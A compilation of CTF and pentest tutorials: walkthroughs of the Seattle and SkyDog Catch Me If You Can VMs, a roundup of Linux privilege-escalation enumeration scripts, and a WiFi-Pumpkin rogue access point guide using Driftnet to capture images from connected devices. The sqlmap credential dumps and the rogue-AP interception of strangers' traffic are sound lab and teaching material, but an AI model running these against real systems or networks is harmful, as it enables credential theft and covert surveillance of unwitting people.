Hack the Seattle VM (CTF Challenge)

This is another article for Boot2Root series in CTF challenges. This lab is prepared by HollyGracefull. This is just a preview of the original lab which stimulates the Ecommerce web application which contains common security errors. Current vulnerabilities are listed below :

·         SQL Injection (Error-based)

·         SQL Injection (Blind)

·         Reflected Cross-Site Scripting

·         Stored Cross-Site Scripting

·         Insecure Direct-Object Reference

·         Username Enumeration

·         Path Traversal

·         Exposed phpinfo()

·         Exposed Administrative Interface

·         Weak Admin Credentials

WalkThrough

Firstly, let’s locate our target.

Our target is 192.168.1.8. Let’s scan it with nmap.

nmap –p- -A 192.168.1.8

The only port we found open was 80. Next we fire up the nikto.

nikto –h 192.168.1.8

Through nikto we discovered two directories : /admin/ and /images/. OK! We made its mental note and decided to move forward with opening our target in browser.

Opening it on the browser we found that it was ecommerce site as hinted by the author. We checked every tab but found nothing except in the blog tab. 

In the blog tab, when you will hover your mouse arrow over the admin in the phrase ‘Hey Admin!’. It will change from arrow to a hand that indicates that means it will open as it a click on.

When you click on it, it will show a username of admin. Ok! I made a note of it. Let’s now check clothing tab.

There is nothing useful in this tab. As the author hinted that website is vulnerable towards SQL attacks so let’s try one. This time let’s try a different SQL attack using BurpSuite. Capture the cookies of the webpage through BurpSuite.

Copy the cooky string and paste it in a simple text file.

Then start the SQL attack by typing the following command in the terminal of Kali.

sqlmap –r /root/Desktop/sea.txt –dbs

Here,

/root/Desktop/sea.txt is the path of the text file in which we had saved t he cookies.

This command will give us the name of following database.

Out of these databases we will dump the tables of seattle with the following command :

sqlmap –r /root/Desktop/sea.txt –D seattle --tables

And with that we will have all the name of the tables as you can see in the following image.

Next we will dump the columns of the tables with the following command :

sqlmap –r /root/Desktop/sea.txt –D seattle –T tblMembers --columns

The execution of the above command will show the table names as following :

Now in the table names there is a table password. Now we already have the username of the admin and we just want the password. So now we will dump the contents of password table.

sqlmap –r /root/Desktop/sea.txt –D seattle –T tblmembers –C password --dump

And voila! We have the password i.e. Assasin1

Now in the browser, go to my account tab and there you will find a login portal. Give the username and password of the admin and click on Login.

And you will be logged in as the admin.

This CTF does contain any flag. All that required was to have admin access and yooohoooo!! We have that.

4 Ways to get Linux Privilege Escalation

When you exploit the victim pc there would be certain limits which resist performing some action even after you are having the shell of victim’s pc. To get complete access of your victim pc; you need to bypass privilege escalation where a user receives privileges they are not authorize to. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. Metasploit has various other post exploits that will use a number of different techniques to attempt to gain system level privileges on the remote system. But apart from it there are some scripts for Linux that may come in useful when trying to escalate privileges on a target system. This is generally aimed at enumeration rather than specific vulnerabilities/exploits. This type of script could save your much time.

Use payload for Linux and start multi/handler for reverse connection. Once you hacked the victim pc now go for privilege escalation using following scripts.

LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks Shellscript that enumerates the system configuration and high-level summary of the checks/tasks performed by LinEnum:

Privileged access: Diagnose if the current user has sudo access without a password; whether the root’s home directory accessible.

System Information: Hostname, Networking details, Current IP and etc.

User Information: Current user, List all users including uid/gid information, List root accounts, Checks if password hashes are stored in /etc/passwd

Kernel and distribution release details.

Git clone https://github.com/rebootuser/LinEnum.git

Once you download this script from there you can simply run it by tying ./LinEnum.sh on terminal. Hence it will dump all fetched data and system details.

./LinEnum.sh

Linuxprivchecker

Enumerates the system configuration and runs some privilege escalation checks as well. It is a python implementation to suggest exploits particular to the system that's been taken under. To download the script click on the link http://www.securitysift.com/download/linuxprivchecker.py

Now to use this script just type python linuxprivchecke.py on terminal and this will enumerate file and directory permissions/contents. This script works same as LinEnum and hunts details related to system network and user.

python linuxprivchecker.py

Linux Exploit Suggester

It is based on operating system release number. This program will perform a 'uname -r' to grab the Linux Operating Systems release version, and return a suggestive list of possible exploits. Additionally possible to provide '-k' flag to manually enter the Kernel Version. It is a Perl script that does not exactly same as above. Type following to download this script:

git clone https://github.com/PenturaLabs/Linux_Exploit_Suggester.git

If you are aware from the kernel version then directly execute the script by typing following on terminal:

./Linux_Exploit_Suggester.pl -k 3.5

If not then type ./Linux_Exploit_Suggester.pl uname –r to know the version of your kernel and go for above command and replace my kernel version from yours.  Hence it suggests the possible exploit for privilege escalation.

Unix-Privesc-checker

 Shell script to check privilege escalation vectors on UNIX systems. Unix-privesc-checker is a script that runs on UNIX systems and Linux system. It seek to find misconfigurations that could allow a not authorize users to escalate privileges to other users or to access local apps.

It is written as a single shell script so it can be easily uploaded and execute. It can be execute either as a normal user or as root. When it finds a group-writable file or directory it only flags an issue if that group has more than one non-root member.

To download this script type following on terminal

Git clone https://github.com/pentestmonkey/unix-privesc-check.git

Unzip the folder and execute the script by typing following

unix-privesc-check standard

So you can also check the way I am using these script from given images which could help you in a better way. And similarly use another command for same purpose.

unix-privesc-check detailed

Capture Images in Victim,s Mobile using Driftnet through Wifi Pumpkin

WiFi-Pumpkin is an open source security tool that provides the Rogue access point to Man-In-The-Middle and network attacks. Using WiFi Pumpkin, one can create a wifi network that captures all the requests made within the network by any device that connects to the network.

First of all u need to download WiFi Pumpkin and install it in your Kali Linux. To download WiFi Pumpkin, go to https://github.com/P0cL4bs/WiFi-Pumpkin and click on Clone or Download. Thereafter, copy the url to clipboard and open the terminal. Type in :-

 git clone "url copied to clipboard"

Next, go to the directory of WiFi Pumpkin on the terminal. For eg. if the repo is downloaded to the Desktop, type:

cd Desktop/WiFi-Pumpkin

./installer.sh --install

Thereafter, run wifi-pumpkin:

This will open the gui version of WiFi-Pumpkin. Now select the network adapter and change the SSID from PumpAP and rename it as desired.

Thereafter click on the Start button. This will create a new wifi-zone with the name entered in the SSID field.

Now as soon as any device connects to this wifi network, its details will be shown in the table at the right. Select any target device from the list of connected device/s and select Active Driftnet from the Tools menu.  

As soon as Driftnet starts, it will start sending screenshots from the victim's desktop/mobile. This will also capture the images of facebook.

Hack the SkyDog Con CTF 2016 - Catch Me If You Can VM

SkyDog is the second VM in CTF series created by James Brower. It is configured with DHCP so the IP will be given to it automatically. This VM is based on Catch me if you can which is movie about Frank who is conman. So it is correct to assume that a broad OSINT concept will be used in it. This is an amazing VM as it uses about hacking and forensic skills. The author of this VM has given us hints about all the eight flags as below:

Flag #1 : Don’t go Home Frank! There’s a Hex on Your House.

Flag #2 : Obscurity or Security?

Flag #3 : Be Careful Agent, Frank Has Been Known to Intercept Traffic Our Traffic.

Flag #4 : A Good Agent is Hard to Find.

Flag #5 : The Devil is in the Details – Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices

Flag #6 :  Where in the World is Frank?

Flag #7 : Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!

Flag #8 : Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!

Except this we know that the flags are in MD5 Hash. You can download it from: https://www.vulnhub.com/entry/skydog-2016-catch-me-if-you-can,166/.

Penetrating Methodology

§  Network Scanning (Netdiscover, Nmap)

§  Examine source code of the web page 

§  Extracting and decoding of hex value for 1^st flag

§  Login into SSH for 2^nd flag 

§  Abusing HTTPS for 3^rd flag

§  Intercept the Browser request and Change user-agent (Burp-suite)

§  Obtain the 4^th flag and follow the clue

§  Explore FBI workstation and abuse its source code FBI.txt file

§  Decrypt the 5^th flag to obtain credential

§  Download the image after login

§  Extract hidden code from inside the image (steghide)

§  Open the flag.txt file and capture the 6^th flag along with password.

§  Login into SSH and capture the 7^th flag

§  Download zip file via SCP and unzip

§  Forensic Trick-Extract file info to capture 8^th flag (volatility)

WalkThrough

Let us find our target first by using the following command in the terminal of kali :

netdiscover

We can clearly see that our target IP is 192.168.1.100. Now as we have identified our target let’s scanning the IP with nmap.

nmap -p- -sV 192.168.1.100

With the assistance of nmap you can see that the port number 22, 80, 443, and 22222 are working with the service of SSH (closed), HTTP, HTTPS and SSH (open). Here, you can observe that using port forwarding the service of SSH has been forwarded to the port number 22222 from its default port that is 22. Also, the service is closed on 22 and open on 22222. This is a minor security feature to throw off attackers.

As port 80 is open, along with 443; we can open this IP in a browser.

The home page has nothing to go on for us therefore we checked its page source.

In the page source you will find a directory. Let’s open it and see what it has got for us.

The directory too didn’t had much to go on, so we viewed the page source again and there we found a hex value. Now from the first hint given by the author, which is Flag #1: Don’t go Home Frank! There’s a Hex on Your House, we can tell that this hex is our first flag. Lets convert the hex by using the following command in the terminal of kali :

echo | xxd -p -r

Here,

xxd à is used to create a hex dump

-p à is used so the output can be in the plain text

-r à is used convert the hex

Using the above command the hex is converted as you can see in the image above. And so when we convert this flag from MD5 hash. Hence, the flag is nmap that means our next hint is nmap and that is where we should look.

As explained earlier, the port SSH has been given a security feature in the nmap so we should poke it by typing the following command:

ssh 192.168.1.100 -p22222

And so we have our next flag; upon de-hashing it turns out to be encrypt.

We will find our next flag somewhere in the encryption on the webpage. The most basic encryption given to the webpage is a security certificate. Let’s check that out.

Click on the highlight area as shown in the above picture. The following dialogue box will open.

Click on the security tab as shown in the above image. And then click on View Certificate button. In the certificate you will find the third flag as shown below:

When converted; our next flag turns out to be personnel.

I had assumed “personne1” as a directory, so let’s open it in a browser.

As shown, the directory says that “you do not appear to be from an FBI workstation” that means there is somewhere FBI workstation. I looked back through every page source we had and found that we need internet explorer 4 for the FBI workstation.

Now, reload the personal directory and capture its cooking using bursuite; which will help you change the browser.

In the burpsuite, once you have capture the cookies change user-agaent “linux x86_64” to “MSIE 4.0” as shown in the images.

And once you forward the request from burp-suite and the personal directory page will load. There you will find you’re next flag and a hint with that flag i.e. we have to add a prefix ‘new’ to whatever the flag we have after decrypting hash value.

Upon converting our flag is evidence. So adding the prefix new our flag becomes newevidence.

Now the directory /newevidence takes us to a FBI login portal.

Now we don’t have any username and password and no clue about it too. So I explored its page source.

In the page source there we found two important things i.e. evidence.txt When opened, evidence.txt gave us our next flag.

Once converted the flag is panam.

Now let’s open newevidence which we found in previous flag.

Its shows us an image. There must be stegno-graphed message in the image. Therefore, use the following command to see it :

steghide extract -sf newevidence.jpeg

The hidden file was flag.txt to read the flag, type :

cat flag.txt

By dehashing the flag we get ILoveFrance. And we also have a clue i.e. iheartbrenda. This flag and clue are both important, make its note.

For our seventh flag we have the hint — Flag #7 : Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive! In this hint it says “I am the fastest man alive” this is the introductory dialogue of The Flash. And even in the movie Frank uses a fake name Barry Allen, original name of the flash.

Therefore, barry allen can be our username. Let’s log in through SSH port using bary allen username. When it asked for password I tried both ILoveFrance and iheartbrenda and fortunately iheartbrenda was the correct password.

Once we were logged in, we used following commands to find our flag :

ls à to see all the list of all the files

cat flag.txt à to read the flag

And so, we have our next flag. Once de-hashed the flag was theflash

As we have both password and username for the login of SSH; here we can use scp service commands. You can use SCP (the scp command) to securely copy files and directories between remote hosts without starting an FTP session or logging into the remote systems explicitly.

scp -P 22222 barryallen@192.168.1.100:/home/barryallen/security-system.data /root/Desktop/file

Once you have the file, unzip it and for that type:

unzip file

Now by using the following command we complete our CTF challenge.

volatility –f security-system.data notepad

YAY! Once again, we have completed a CTF challenge successfully.